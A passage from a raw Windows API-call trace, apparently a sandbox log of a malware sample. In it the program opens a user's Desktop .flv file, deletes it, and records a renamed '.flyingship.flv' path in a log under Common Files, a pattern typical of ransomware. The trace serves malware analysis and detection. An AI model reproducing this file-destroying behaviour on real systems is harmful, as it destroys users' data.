[0167.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.819] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.819] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.819] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0167.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0167.819] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0167.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0167.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0167.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tteahk_e6.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0167.822] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.822] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0167.822] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.822] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.823] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0167.823] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0167.823] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0167.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd918 [0167.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd918, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0167.825] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.825] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0167.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0167.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0167.826] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.826] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0167.826] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0167.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.827] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0167.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0167.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0167.828] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.828] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0167.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv", lpFilePart=0x0) returned 0x33 [0167.829] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x9632f80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 0x90ae18 [0167.829] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tteahk_e6.flv")) returned 1 [0167.833] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b7cd50, ftCreationTime.dwHighDateTime=0x1d5e14b, ftLastAccessTime.dwLowDateTime=0x33873000, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x9632f80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x411c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="TtEAhK_e6.flv", cAlternateFileName="TTEAHK~1.FLV")) returned 0 [0167.833] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0167.834] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0167.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.834] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.836] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.836] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.836] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0167.836] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.836] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.837] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0167.837] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xb70, lpOverlapped=0x0) returned 1 [0167.837] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0167.837] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xb70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.837] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0167.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv\r\n", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0167.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv\r\n", cchWideChar=65, lpMultiByteStr=0x9aa4f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv\r\n", lpUsedDefaultChar=0x0) returned 65 [0167.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0167.838] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x40, lpOverlapped=0x0) returned 1 [0167.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0167.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.838] CloseHandle (hObject=0x138) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0167.839] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0167.840] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0167.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: 